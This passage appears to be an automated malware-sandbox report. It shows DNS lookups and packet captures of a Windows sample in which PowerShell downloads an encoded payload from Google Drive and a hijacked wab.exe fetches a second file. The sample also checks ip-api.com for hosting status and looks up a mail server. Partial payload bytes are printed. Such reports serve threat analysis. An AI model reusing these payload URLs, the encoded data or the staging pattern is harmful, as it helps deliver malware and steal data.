                                                                          Apr 24, 2024 06:46:01.930002928 CEST1.1.1.1192.168.2.90x1cf2No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:07.796128035 CEST1.1.1.1192.168.2.90x574eNo error (0)drive.google.com142.250.101.113A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:07.796128035 CEST1.1.1.1192.168.2.90x574eNo error (0)drive.google.com142.250.101.101A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:07.796128035 CEST1.1.1.1192.168.2.90x574eNo error (0)drive.google.com142.250.101.102A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:07.796128035 CEST1.1.1.1192.168.2.90x574eNo error (0)drive.google.com142.250.101.100A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:07.796128035 CEST1.1.1.1192.168.2.90x574eNo error (0)drive.google.com142.250.101.138A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:07.796128035 CEST1.1.1.1192.168.2.90x574eNo error (0)drive.google.com142.250.101.139A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:08.757863045 CEST1.1.1.1192.168.2.90xeb41No error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.285806894 CEST1.1.1.1192.168.2.90x9106No error (0)drive.google.com142.250.101.113A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.285806894 CEST1.1.1.1192.168.2.90x9106No error (0)drive.google.com142.250.101.100A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.285806894 CEST1.1.1.1192.168.2.90x9106No error (0)drive.google.com142.250.101.138A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.285806894 CEST1.1.1.1192.168.2.90x9106No error (0)drive.google.com142.250.101.139A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.285806894 CEST1.1.1.1192.168.2.90x9106No error (0)drive.google.com142.250.101.101A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:46:57.285806894 CEST1.1.1.1192.168.2.90x9106No error (0)drive.google.com142.250.101.102A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:47:00.728956938 CEST1.1.1.1192.168.2.90x703cNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                          Apr 24, 2024 06:47:03.453811884 CEST1.1.1.1192.168.2.90x46a4No error (0)mail.cash4cars.nz114.142.162.17A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • drive.google.com
                                                                          • drive.usercontent.google.com
                                                                          • ip-api.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.949714208.95.112.180316C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Apr 24, 2024 06:47:00.893723965 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Apr 24, 2024 06:47:01.053816080 CEST175INHTTP/1.1 200 OK
                                                                          Date: Wed, 24 Apr 2024 04:47:00 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 6
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 60
                                                                          X-Rl: 44
                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                          Data Ascii: false


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.949706142.250.101.1134434632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-24 04:46:08 UTC215OUTGET /uc?export=download&id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Connection: Keep-Alive
                                                                          2024-04-24 04:46:08 UTC1582INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Wed, 24 Apr 2024 04:46:08 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: script-src 'nonce-7PMQZa6iNPZCly1vgT8qvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.949707142.251.2.1324434632C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-24 04:46:09 UTC233OUTGET /download?id=1HPmRWXdwNI6X5gYsmI9v6eKJzIt1G-tt&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          2024-04-24 04:46:10 UTC4742INHTTP/1.1 200 OK
                                                                          X-GUploader-UploadID: ABPtcPonXb5GegoztR2eFcTMupXY6M-Fkr9BnhdDCUPXa-WU2ErGRQ1Sk8ccrGP-t786GM5Dbtc
                                                                          Content-Type: application/octet-stream
                                                                          Content-Security-Policy: sandbox
                                                                          Content-Security-Policy: default-src 'none'
                                                                          Content-Security-Policy: frame-ancestors 'none'
                                                                          X-Content-Security-Policy: sandbox
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Resource-Policy: same-site
                                                                          X-Content-Type-Options: nosniff
                                                                          Content-Disposition: attachment; filename="Vngers.hhk"
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Credentials: false
                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 435476
                                                                          Last-Modified: Wed, 24 Apr 2024 01:18:01 GMT
                                                                          Date: Wed, 24 Apr 2024 04:46:10 GMT
                                                                          Expires: Wed, 24 Apr 2024 04:46:10 GMT
                                                                          Cache-Control: private, max-age=0
                                                                          X-Goog-Hash: crc32c=/63KXw==
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
                                                                          2024-04-24 04:46:10 UTC4742INData Raw: 63 51 47 62 63 51 47 62 75 36 35 48 47 51 42 78 41 5a 76 72 41 70 69 44 41 31 77 6b 42 4f 73 43 39 74 5a 78 41 5a 75 35 65 53 45 34 32 75 73 43 77 4a 72 72 41 6d 42 58 67 63 48 45 30 69 37 55 63 51 47 62 63 51 47 62 67 66 45 39 39 47 61 75 63 51 47 62 63 51 47 62 63 51 47 62 36 77 4c 51 74 62 70 49 56 37 4f 79 63 51 47 62 63 51 47 62 36 77 4c 49 7a 33 45 42 6d 7a 48 4b 63 51 47 62 36 77 4a 47 74 59 6b 55 43 33 45 42 6d 2b 73 43 55 61 76 52 34 75 73 43 54 67 74 78 41 5a 75 44 77 51 52 78 41 5a 76 72 41 6d 4a 4d 67 66 6b 53 32 36 38 43 66 4d 76 72 41 75 54 41 36 77 4a 51 54 49 74 45 4a 41 54 72 41 73 53 6d 36 77 4a 4a 73 49 6e 44 36 77 4a 52 4f 33 45 42 6d 34 48 44 54 61 6a 4b 41 4f 73 43 37 36 6a 72 41 69 76 4f 75 6c 43 32 6d 70 35 78 41 5a 76 72 41 68 47
                                                                          Data Ascii: cQGbcQGbu65HGQBxAZvrApiDA1wkBOsC9tZxAZu5eSE42usCwJrrAmBXgcHE0i7UcQGbcQGbgfE99GaucQGbcQGbcQGb6wLQtbpIV7OycQGbcQGb6wLIz3EBmzHKcQGb6wJGtYkUC3EBm+sCUavR4usCTgtxAZuDwQRxAZvrAmJMgfkS268CfMvrAuTA6wJQTItEJATrAsSm6wJJsInD6wJRO3EBm4HDTajKAOsC76jrAivOulC2mp5xAZvrAhG
                                                                          2024-04-24 04:46:10 UTC4742INData Raw: 57 42 56 34 31 63 62 41 71 7a 71 46 35 36 39 38 4d 41 54 37 54 75 4e 56 78 44 6f 53 77 4b 79 42 79 63 73 32 5a 76 6f 2f 7a 39 4c 61 4e 72 41 79 6e 54 4d 78 42 49 79 61 54 2f 51 73 77 4f 47 62 67 47 6e 5a 36 41 52 65 33 42 47 6c 47 50 47 32 37 65 6f 4b 37 6d 2b 55 4a 57 30 55 41 4b 57 79 70 6d 41 61 36 72 2b 49 4a 4d 59 6f 56 6f 49 6c 4d 72 71 47 43 6e 6b 6d 30 2f 33 52 79 48 6b 42 4d 4c 4e 43 34 63 7a 41 76 49 48 48 46 56 51 37 70 48 70 78 77 39 57 67 54 45 47 31 43 64 62 73 46 38 2b 64 58 77 47 78 32 71 4c 39 68 65 4e 68 35 35 59 43 4d 5a 70 32 4f 36 39 6d 41 56 6f 4d 68 45 33 48 55 54 7a 52 7a 7a 48 4d 77 4c 79 42 78 79 37 71 4d 61 68 6a 70 44 55 31 7a 6a 72 36 72 77 6e 66 4f 6c 4a 4e 6c 38 6b 6a 67 71 54 38 66 53 6d 67 41 75 2f 70 4a 34 4a 55 30 2f 37
                                                                          Data Ascii: WBV41cbAqzqF5698MAT7TuNVxDoSwKyBycs2Zvo/z9LaNrAynTMxBIyaT/QswOGbgGnZ6ARe3BGlGPG27eoK7m+UJW0UAKWypmAa6r+IJMYoVoIlMrqGCnkm0/3RyHkBMLNC4czAvIHHFVQ7pHpxw9WgTEG1CdbsF8+dXwGx2qL9heNh55YCMZp2O69mAVoMhE3HUTzRzzHMwLyBxy7qMahjpDU1zjr6rwnfOlJNl8kjgqT8fSmgAu/pJ4JU0/7
                                                                          2024-04-24 04:46:10 UTC478INData Raw: 72 59 74 48 77 47 7a 64 49 4b 42 63 4f 75 69 6b 32 59 6f 4a 41 55 52 4e 6a 66 56 47 4f 49 47 57 39 2f 4a 53 52 76 54 72 6b 50 49 51 63 79 30 73 39 32 4f 4c 4c 47 72 6a 4c 33 33 49 43 35 69 6b 48 33 39 49 69 75 48 44 77 6f 5a 56 50 6d 39 47 6c 6b 37 4e 53 42 78 49 6a 6b 31 51 67 69 6b 56 7a 5a 62 78 33 4c 67 35 6e 52 43 63 46 48 58 77 7a 71 6e 59 63 77 6d 74 7a 71 6e 4a 4e 6c 4a 32 6f 71 4c 61 32 78 34 75 62 74 75 44 5a 61 6b 63 66 55 4d 4e 77 68 48 35 72 51 2b 52 79 4c 74 32 44 62 6b 4d 54 76 30 61 4e 4b 55 30 62 55 33 66 6c 66 77 4f 6e 43 5a 37 36 6b 52 48 54 4d 79 56 53 57 66 4a 48 4d 78 61 63 61 6c 74 48 37 69 64 4a 61 71 6a 6e 36 69 4b 43 55 49 46 62 4e 69 64 50 56 51 76 5a 34 4b 4b 49 54 48 62 69 4a 31 4d 55 49 49 6f 48 63 53 57 72 69 55 2f 66 63 7a
                                                                          Data Ascii: rYtHwGzdIKBcOuik2YoJAURNjfVGOIGW9/JSRvTrkPIQcy0s92OLLGrjL33IC5ikH39IiuHDwoZVPm9Glk7NSBxIjk1QgikVzZbx3Lg5nRCcFHXwzqnYcwmtzqnJNlJ2oqLa2x4ubtuDZakcfUMNwhH5rQ+RyLt2DbkMTv0aNKU0bU3flfwOnCZ76kRHTMyVSWfJHMxacaltH7idJaqjn6iKCUIFbNidPVQvZ4KKITHbiJ1MUIIoHcSWriU/fcz
                                                                          2024-04-24 04:46:10 UTC1255INData Raw: 38 69 6e 62 4a 5a 38 6b 35 2f 53 66 56 71 5a 57 4d 6f 54 66 70 75 65 6b 6e 62 53 65 33 51 61 4e 79 61 54 66 6f 49 68 59 70 69 51 52 33 42 65 50 52 42 4d 56 38 35 72 37 39 47 67 2b 34 52 50 62 64 66 44 6c 38 58 6c 37 67 6b 74 4d 61 4c 41 51 30 4f 54 4d 6f 4d 54 34 42 32 6b 58 54 4f 6d 6e 57 4d 41 46 7a 41 4a 45 37 31 56 49 53 59 74 48 75 33 54 6e 4f 4c 6e 7a 4e 6d 7a 36 62 4a 6f 66 55 70 64 5a 44 66 39 51 4a 70 68 4d 68 38 6c 4f 38 58 35 38 4b 75 34 45 30 2f 37 46 58 62 57 42 56 4f 64 70 63 52 53 43 57 4b 4f 68 45 62 38 7a 6d 64 44 69 39 4f 51 64 57 4b 43 73 33 64 2f 41 57 56 2f 73 54 79 50 4d 33 2f 6f 70 6c 71 4e 2f 56 35 61 67 71 46 62 37 78 72 52 63 79 45 36 6a 6b 63 41 61 2f 51 39 68 74 65 4b 74 58 43 75 4d 78 6a 4b 76 59 76 47 6f 62 39 47 4d 69 30 67
                                                                          Data Ascii: 8inbJZ8k5/SfVqZWMoTfpueknbSe3QaNyaTfoIhYpiQR3BePRBMV85r79Gg+4RPbdfDl8Xl7gktMaLAQ0OTMoMT4B2kXTOmnWMAFzAJE71VISYtHu3TnOLnzNmz6bJofUpdZDf9QJphMh8lO8X58Ku4E0/7FXbWBVOdpcRSCWKOhEb8zmdDi9OQdWKCs3d/AWV/sTyPM3/oplqN/V5agqFb7xrRcyE6jkcAa/Q9hteKtXCuMxjKvYvGob9GMi0g
                                                                          2024-04-24 04:46:10 UTC61INData Raw: 4b 31 2b 71 79 6a 78 45 7a 53 6a 57 66 2f 47 74 5a 5a 6a 2b 30 78 63 4e 73 63 64 43 47 62 49 48 4d 77 4c 79 4c 77 6e 77 72 61 46 44 48 72 64 4a 47 45 79 73 56 69 38 54 63 33 51 68 44
                                                                          Data Ascii: K1+qyjxEzSjWf/GtZZj+0xcNscdCGbIHMwLyLwnwraFDHrdJGEysVi8Tc3QhD
                                                                          2024-04-24 04:46:10 UTC1255INData Raw: 7a 52 6f 55 79 6d 38 62 47 34 54 43 4d 72 4c 71 4d 55 37 35 4d 4b 50 34 6d 36 59 68 4a 56 65 71 65 65 49 56 75 4b 2f 44 68 31 74 76 6d 43 6d 37 52 7a 77 7a 37 6b 53 65 74 6f 4c 43 58 30 54 63 78 4f 66 31 34 37 53 65 75 4a 4a 4e 6d 6c 54 65 51 6f 62 32 2b 46 6d 34 42 46 36 4d 45 6e 55 54 49 4a 59 4d 6a 6e 70 59 5a 2b 57 74 52 54 52 79 79 64 41 70 53 37 57 7a 4c 58 52 6b 6d 4a 7a 39 75 38 57 49 35 63 4f 4a 67 48 55 45 7a 58 6b 34 72 38 4f 4f 35 65 52 65 35 4e 4a 2b 79 31 64 43 65 5a 34 33 6c 4c 79 52 7a 4d 34 34 64 41 79 41 74 44 57 38 43 43 54 57 7a 4e 43 38 68 4f 64 76 58 4d 30 66 36 4b 4f 71 43 53 31 56 69 64 50 67 70 71 58 61 6d 4b 4f 6b 43 37 4f 30 2b 64 50 70 4f 53 66 6f 79 43 77 6e 62 70 50 62 48 78 37 53 42 51 30 2b 63 74 41 7a 79 57 57 6e 47 68 62
                                                                          Data Ascii: zRoUym8bG4TCMrLqMU75MKP4m6YhJVeqeeIVuK/Dh1tvmCm7Rzwz7kSetoLCX0TcxOf147SeuJJNmlTeQob2+Fm4BF6MEnUTIJYMjnpYZ+WtRTRyydApS7WzLXRkmJz9u8WI5cOJgHUEzXk4r8OO5eRe5NJ+y1dCeZ43lLyRzM44dAyAtDW8CCTWzNC8hOdvXM0f6KOqCS1VidPgpqXamKOkC7O0+dPpOSfoyCwnbpPbHx7SBQ0+ctAzyWWnGhb
                                                                          2024-04-24 04:46:10 UTC1255INData Raw: 5a 65 42 45 33 49 73 52 33 42 66 39 45 63 70 7a 42 78 46 6a 76 51 64 7a 41 75 65 6f 6a 76 36 42 76 39 4e 7a 52 65 4e 50 43 35 4a 38 75 30 36 64 78 56 46 42 53 37 67 51 41 68 6d 74 55 47 79 38 47 6c 67 44 57 77 48 52 6e 69 36 64 47 73 76 7a 2b 48 61 43 44 36 78 48 45 50 76 68 33 72 59 7a 73 77 75 69 75 58 59 46 57 66 6b 66 76 4b 6b 6c 68 50 4e 77 68 77 63 7a 41 76 49 48 47 70 4d 66 56 36 47 47 47 48 71 39 33 53 6e 50 4f 6e 36 57 6b 6d 6a 79 57 33 39 4b 78 6c 74 68 6f 32 77 37 72 55 59 69 42 4c 44 36 41 38 7a 4a 69 65 78 50 38 4e 48 52 74 54 51 32 72 4a 50 55 2f 57 79 4e 66 46 46 6d 72 35 45 37 50 67 6e 38 4a 78 57 2f 41 58 4e 33 59 69 76 33 61 72 39 7a 55 65 78 53 48 2b 6a 2b 69 44 30 37 51 2f 49 6c 59 6b 76 6d 71 62 31 42 6c 44 35 54 66 6d 36 41 41 79 69
                                                                          Data Ascii: ZeBE3IsR3Bf9EcpzBxFjvQdzAueojv6Bv9NzReNPC5J8u06dxVFBS7gQAhmtUGy8GlgDWwHRni6dGsvz+HaCD6xHEPvh3rYzswuiuXYFWfkfvKklhPNwhwczAvIHGpMfV6GGGHq93SnPOn6WkmjyW39Kxltho2w7rUYiBLD6A8zJiexP8NHRtTQ2rJPU/WyNfFFmr5E7Pgn8JxW/AXN3Yiv3ar9zUexSH+j+iD07Q/IlYkvmqb1BlD5Tfm6AAyi
                                                                          2024-04-24 04:46:10 UTC1255INData Raw: 57 4a 56 61 79 30 33 35 50 73 48 6c 5a 6b 6e 75 6a 37 49 50 2b 6b 33 68 4c 38 65 30 52 30 6e 65 43 75 6b 7a 38 35 2b 58 51 66 2f 46 47 46 55 6c 43 6e 54 42 62 33 78 39 57 30 34 42 4d 55 7a 6b 38 41 47 32 44 31 37 6b 4b 72 49 37 79 75 66 30 36 32 79 54 6e 62 46 33 56 2b 76 4d 43 38 65 52 66 57 48 49 48 4a 5a 62 51 35 6e 71 43 63 67 63 4d 33 37 73 6c 55 6b 7a 79 68 7a 4d 57 6e 47 74 6f 33 5a 6a 6e 54 32 44 39 54 79 74 69 6a 6e 46 73 7a 49 51 6e 54 31 4e 74 48 79 66 69 69 45 4d 66 67 69 4a 6c 63 31 6c 65 6c 6d 57 76 4a 52 43 62 70 57 70 48 66 72 35 78 4b 55 68 37 62 42 6b 58 71 74 78 74 42 79 6a 62 67 37 7a 47 64 62 77 72 6a 43 46 62 4f 50 62 59 30 41 30 7a 63 5a 34 64 78 70 42 6c 64 75 64 64 39 43 56 73 35 39 48 74 4f 73 45 69 6c 38 74 6f 49 30 5a 51 4b 53
                                                                          Data Ascii: WJVay035PsHlZknuj7IP+k3hL8e0R0neCukz85+XQf/FGFUlCnTBb3x9W04BMUzk8AG2D17kKrI7yuf062yTnbF3V+vMC8eRfWHIHJZbQ5nqCcgcM37slUkzyhzMWnGto3ZjnT2D9TytijnFszIQnT1NtHyfiiEMfgiJlc1lelmWvJRCbpWpHfr5xKUh7bBkXqtxtByjbg7zGdbwrjCFbOPbY0A0zcZ4dxpBldudd9CVs59HtOsEil8toI0ZQKS
                                                                          2024-04-24 04:46:10 UTC1255INData Raw: 43 4b 68 58 32 6c 76 44 63 73 78 58 37 57 79 79 61 44 53 7a 6e 73 78 30 65 47 51 64 61 65 77 4e 6e 46 58 67 79 34 39 79 74 36 71 53 5a 71 55 4d 50 59 36 4e 38 2b 32 72 59 31 77 2b 50 68 7a 4d 6a 75 78 41 52 6d 59 4b 59 42 56 48 77 36 5a 4d 2b 73 50 38 75 43 76 32 32 69 39 51 54 45 77 73 78 42 52 7a 4d 43 38 67 63 56 64 58 49 33 61 59 2b 2f 34 56 71 34 38 66 62 39 6f 44 49 48 4d 77 4c 79 49 53 75 64 56 79 68 49 31 6c 79 69 46 77 4b 59 35 30 2b 77 67 4d 42 7a 6f 6f 36 2f 6a 39 79 56 5a 30 6d 74 47 39 35 2b 46 70 55 6c 53 30 4b 32 59 47 71 6a 6a 46 68 33 6c 36 6b 4d 67 32 34 58 67 70 7a 49 49 2f 32 67 45 57 39 68 45 37 4b 2b 74 6d 2b 43 42 47 2f 55 58 51 73 4c 69 4f 72 53 46 6d 71 4a 75 51 4d 70 65 47 62 6d 43 46 53 72 70 6b 48 55 5a 6a 51 69 77 50 32 2f 52
                                                                          Data Ascii: CKhX2lvDcsxX7WyyaDSznsx0eGQdaewNnFXgy49yt6qSZqUMPY6N8+2rY1w+PhzMjuxARmYKYBVHw6ZM+sP8uCv22i9QTEwsxBRzMC8gcVdXI3aY+/4Vq48fb9oDIHMwLyISudVyhI1lyiFwKY50+wgMBzoo6/j9yVZ0mtG95+FpUlS0K2YGqjjFh3l6kMg24XgpzII/2gEW9hE7K+tm+CBG/UXQsLiOrSFmqJuQMpeGbmCFSrpkHUZjQiwP2/R
                                                                          2024-04-24 04:46:10 UTC1255INData Raw: 4d 63 7a 41 76 49 48 45 55 73 68 50 68 54 49 62 6b 6c 55 35 6e 71 70 56 4a 48 74 4f 31 66 74 52 4e 44 49 34 70 6c 79 4d 30 4c 79 42 74 34 57 51 69 64 65 64 2f 4a 48 4d 7a 39 6c 47 64 71 57 58 4b 73 52 6f 72 57 6e 54 37 36 68 77 6f 43 69 67 71 6a 39 32 50 6e 54 31 43 43 4b 78 58 66 6c 76 44 47 74 42 34 2f 6e 57 6e 34 39 67 4d 49 67 44 68 30 6f 54 6f 46 32 4b 78 67 44 65 4e 4f 5a 4d 7a 67 33 6f 59 41 30 55 33 79 33 51 33 59 63 5a 4e 50 64 39 48 49 31 4a 69 49 4d 32 4c 44 6a 32 74 52 79 41 75 54 52 6b 32 4f 48 42 33 4d 43 36 43 4a 32 6e 76 48 48 54 73 64 79 42 7a 4d 43 38 69 58 34 38 36 57 74 74 41 55 59 4a 67 31 68 48 4b 4d 5a 48 47 41 67 4e 47 67 38 35 6b 59 43 73 67 63 77 34 61 49 47 4d 77 4c 6f 4d 30 6b 30 42 6e 51 6e 5a 79 35 59 73 48 59 35 69 4a 34 52
                                                                          Data Ascii: MczAvIHEUshPhTIbklU5nqpVJHtO1ftRNDI4plyM0LyBt4WQided/JHMz9lGdqWXKsRorWnT76hwoCigqj92PnT1CCKxXflvDGtB4/nWn49gMIgDh0oToF2KxgDeNOZMzg3oYA0U3y3Q3YcZNPd9HI1JiIM2LDj2tRyAuTRk2OHB3MC6CJ2nvHHTsdyBzMC8iX486WttAUYJg1hHKMZHGAgNGg85kYCsgcw4aIGMwLoM0k0BnQnZy5YsHY5iJ4R


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.949711142.250.101.113443316C:\Program Files (x86)\Windows Mail\wab.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-04-24 04:46:57 UTC216OUTGET /uc?export=download&id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          2024-04-24 04:46:58 UTC1582INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Wed, 24 Apr 2024 04:46:57 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1Bq2Ci98jFSnNo8giLe6NMBJVCVwWFc7q&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-WAZaJOgIBWZkW0CZXIlOPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
